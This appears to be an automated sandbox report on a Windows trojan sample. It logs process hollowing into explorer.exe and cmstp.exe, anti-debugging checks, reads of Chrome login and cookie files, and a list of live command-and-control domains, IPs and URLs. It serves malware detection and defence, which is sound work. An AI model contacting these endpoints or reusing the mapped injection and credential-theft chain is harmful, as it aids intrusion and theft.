          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00BE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_0040CF93 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_004018B6 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 85.187.128.34 80
          Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exe | Domain query: www.un-object.com
          Source: C:\Windows\explorer.exe | Domain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exe | Network Connect: 78.141.192.145 80
          Source: C:\Windows\explorer.exe | Domain query: www.white-hat.uk
          Source: C:\Windows\explorer.exe | Domain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exe | Domain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 192.185.17.12 80
          Source: C:\Windows\explorer.exe | Domain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exe | Network Connect: 199.192.30.147 80
          Source: C:\Windows\explorer.exe | Domain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exe | Domain query: www.younrock.com
          Source: C:\Windows\explorer.exe | Domain query: www.gritslab.com
          Source: C:\Windows\explorer.exe | Network Connect: 161.97.163.8 80
          Source: C:\Windows\explorer.exe | Domain query: www.222ambking.org
          Source: C:\Windows\explorer.exe | Network Connect: 81.17.29.149 80
          Source: C:\Windows\explorer.exe | Domain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exe | Network Connect: 94.176.104.86 80
          Source: C:\Windows\explorer.exe | Network Connect: 213.145.228.111 80
          Source: C:\Windows\explorer.exe | Network Connect: 72.14.185.43 80
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 12A0000
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\mcwfy.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Thread register set: target process: 3324
          Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 3324
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe
          Source: explorer.exe, 00000004.00000000.328321537.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.571846473.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.566841892.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320444720.0000000000878000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_004019C5 cpuid
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          Source: Yara match | File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cmstp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\cmstp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmstp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\cmstp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\cmstp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmstp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmstp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

          Remote Access Functionality

          Source: Yara match | File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Native API | Path Interception | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 512 Process Injection | 2 Obfuscated Files or Information | 1 Input Capture | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 11 Software Packing | Security Account Manager | 16 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Virtualization/Sandbox Evasion | NTDS | 141 Security Software Discovery | Distributed Component Object Model | 1 Input Capture | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 2 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 512 Process Injection | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
          Behavior Graph ID: 830804 | Sample: u8QPnVhq0N.exe | Start date: 20/03/2023 | Architecture: WINDOWS | Score: 100
          Start: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 2 other signatures
            u8QPnVhq0N.exe 19 (started)
              dropped: C:\Users\user\AppData\Local\Temp\mcwfy.exe, PE32
              mcwfy.exe 1 (started): Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; 2 other signatures
                mcwfy.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  explorer.exe 1 1 (injected): un-object.com 192.185.17.12, 49716, 80, UNIFIEDLAYER-AS-1, US, United States; www.222ambking.org 91.195.240.94, 49704, 49705, 80, SEDO-AS, DE, Germany; 13 other IPs or domains; System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                    cmstp.exe 13 (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                    autoconv.exe (started)
                conhost.exe (started)

          Source | Detection | Scanner | Label
          u8QPnVhq0N.exe | 46% | ReversingLabs | Win32.Trojan.Nsisx
          u8QPnVhq0N.exe | 49% | Virustotal
          u8QPnVhq0N.exe | 100% | Joe Sandbox ML
          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\mcwfy.exe | 100% | Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\mcwfy.exe | 33% | ReversingLabs | Win32.Trojan.Lazy
          Source | Detection | Scanner | Label
          6.2.cmstp.exe.12a0000.1.unpack | 100% | Avira | HEUR/AGEN.1252160
          3.2.mcwfy.exe.a30000.2.unpack | 100% | Avira | HEUR/AGEN.1252160
          3.2.mcwfy.exe.6d4700.1.unpack | 100% | Avira | HEUR/AGEN.1252160
          3.2.mcwfy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.mcwfy.exe.2080000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          Source | Detection | Scanner | Label
          www.bitservicesltd.com | 2% | Virustotal
          www.younrock.com | 1% | Virustotal
          www.energyservicestation.com | 0% | Virustotal
          www.thewildphotographer.co.uk | 0% | Virustotal
          Source | Detection | Scanner | Label
          http://www.ecomofietsen.com | 0% | Avira URL Cloud | safe
          http://www.germanreps.com | 0% | Avira URL Cloud | safe
          http://www.thedivinerudraksha.com | 0% | Avira URL Cloud | safe
          http://www.shapshit.xyz | 0% | Avira URL Cloud | safe
          http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm | 100% | Avira URL Cloud | malware
          http://www.white-hat.uk | 0% | Avira URL Cloud | safe
          http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iy | 100% | Avira URL Cloud | malware
          http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk | 100% | Avira URL Cloud | malware
          http://www.avisrezervee.com/u2kb/www.avisrezervee.com | 100% | Avira URL Cloud | malware
          http://www.thedivinerudraksha.com/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.mygloballojistik.online | 0% | Avira URL Cloud | safe
          http://www.employerseervices.com/u2kb/www.employerseervices.com | 0% | Avira URL Cloud | safe
          http://www.gritslab.com/u2kb/www.gritslab.com | 100% | Avira URL Cloud | malware
          http://www.energyservicestation.com/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p | 100% | Avira URL Cloud | malware
          http://www.white-hat.uk/u2kb/www.white-hat.uk | 100% | Avira URL Cloud | malware
          http://www.energyservicestation.com/u2kb/www.energyservicestation.com | 100% | Avira URL Cloud | malware
          http://www.avisrezervee.com | 0% | Avira URL Cloud | safe
          http://www.un-object.com/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.bitservicesltd.com | 0% | Avira URL Cloud | safe
          http://www.white-hat.uk/u2kb/ | 100% | Avira URL Cloud | malware
          https://alldomains.hosting/domain-registrieren.html | 0% | Avira URL Cloud | safe
          http://www.mygloballojistik.online/u2kb/ | 0% | Avira URL Cloud | safe
          http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p | 100% | Avira URL Cloud | malware
          http://justinmezzell.com | 0% | Avira URL Cloud | safe
          http://www.dzyngiri.com | 0% | Avira URL Cloud | safe
          http://www.thewildphotographer.co.uk/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.gritslab.com | 0% | Avira URL Cloud | safe
          http://www.bitservicesltd.com/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.thewildphotographer.co.uk | 0% | Avira URL Cloud | safe
          http://www.gritslab.com/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.222ambking.org/u2kb/www.222ambking.org | 100% | Avira URL Cloud | malware
          http://www.fclaimrewardccpointq.shop/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p | 100% | Avira URL Cloud | malware
          http://www.employerseervices.com/u2kb/ | 0% | Avira URL Cloud | safe
          http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop | 100% | Avira URL Cloud | malware
          http://www.younrock.com | 0% | Avira URL Cloud | safe
          http://www.energyservicestation.com | 0% | Avira URL Cloud | safe
          http://www.avisrezervee.com/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.un-object.com/u2kb/www.un-object.com | 100% | Avira URL Cloud | malware
          http://www.shapshit.xyz/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p | 100% | Avira URL Cloud | malware
          http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online | 0% | Avira URL Cloud | safe
          http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com | 100% | Avira URL Cloud | malware
          https://alldomains.hosting/ | 0% | Avira URL Cloud | safe
          http://www.fclaimrewardccpointq.shop | 100% | Avira URL Cloud | malware
          http://www.ecomofietsen.com/u2kb/ | 100% | Avira URL Cloud | malware
          https://alldomains.hosting/hosting-webhosting.html | 0% | Avira URL Cloud | safe
          http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p | 100% | Avira URL Cloud | malware
          http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p | 100% | Avira URL Cloud | malware
          http://www.employerseervices.com | 0% | Avira URL Cloud | safe
          http://www.222ambking.org/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.germanreps.com/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.germanreps.com/u2kb/www.germanreps.com | 100% | Avira URL Cloud | malware
          http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p | 100% | Avira URL Cloud | malware
          http://www.younrock.com/u2kb/www.younrock.com | 100% | Avira URL Cloud | malware
          http://www.222ambking.org | 0% | Avira URL Cloud | safe
          http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pR | 100% | Avira URL Cloud | malware
          http://www.younrock.com/u2kb/ | 100% | Avira URL Cloud | malware
          http://www.shapshit.xyz/u2kb/www.shapshit.xyz | 100% | Avira URL Cloud | malware
          http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com | 100% | Avira URL Cloud | malware
          http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com | 100% | Avira URL Cloud | malware
          http://www.un-object.com | 0% | Avira URL Cloud | safe
          http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p | 100% | Avira URL Cloud | malware
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.bitservicesltd.com | 161.97.163.8 | true | true | | unknown
          www.younrock.com | 81.17.29.149 | true | true | | unknown
          www.energyservicestation.com | 213.145.228.111 | true | true | | unknown
          www.thewildphotographer.co.uk | 72.14.185.43 | true | true | | unknown
          www.shapshit.xyz | 199.192.30.147 | true | true | | unknown
          www.222ambking.org | 91.195.240.94 | true | true | | unknown
          thedivinerudraksha.com | 85.187.128.34 | true | true | | unknown
          un-object.com | 192.185.17.12 | true | true | | unknown
          white-hat.uk | 94.176.104.86 | true | true | | unknown
          gritslab.com | 78.141.192.145 | true | true | | unknown
          www.un-object.com | unknown | unknown | true | | unknown
          www.white-hat.uk | unknown | unknown | true | | unknown
          www.gritslab.com | unknown | unknown | true | | unknown
          www.thedivinerudraksha.com | unknown | unknown | true | | unknown
          www.fclaimrewardccpointq.shop | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://www.thedivinerudraksha.com/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.energyservicestation.com/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p | true | Avira URL Cloud: malware | unknown
          http://www.un-object.com/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p | true | Avira URL Cloud: malware | unknown
          http://www.thewildphotographer.co.uk/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.bitservicesltd.com/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p | true | Avira URL Cloud: malware | unknown
          http://www.gritslab.com/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p | true | Avira URL Cloud: malware | unknown
          http://www.shapshit.xyz/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p | true | Avira URL Cloud: malware | unknown
          http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p | true | Avira URL Cloud: malware | unknown
          http://www.222ambking.org/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p | true | Avira URL Cloud: malware | unknown
          http://www.younrock.com/u2kb/ | true | Avira URL Cloud: malware | unknown
          http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p | true | Avira URL Cloud: malware | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://duckduckgo.com/chrome_newtab | cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr | false | | high
          http://www.avisrezervee.com/u2kb/www.avisrezervee.com | explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          https://duckduckgo.com/ac/?q= | HI4NJ046K.6.dr | false | | high
          http://www.gritslab.com/u2kb/www.gritslab.com | explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c | explorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://img.sedoparking.com | explorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://search.yahoo.com?fr=crmas_sfp | cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr | false | | high
          http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk | explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm | cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
          http://www.mygloballojistik.online | explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe
                                          unknown
                                          http://www.shapshit.xyzexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.germanreps.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ecomofietsen.comexplorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
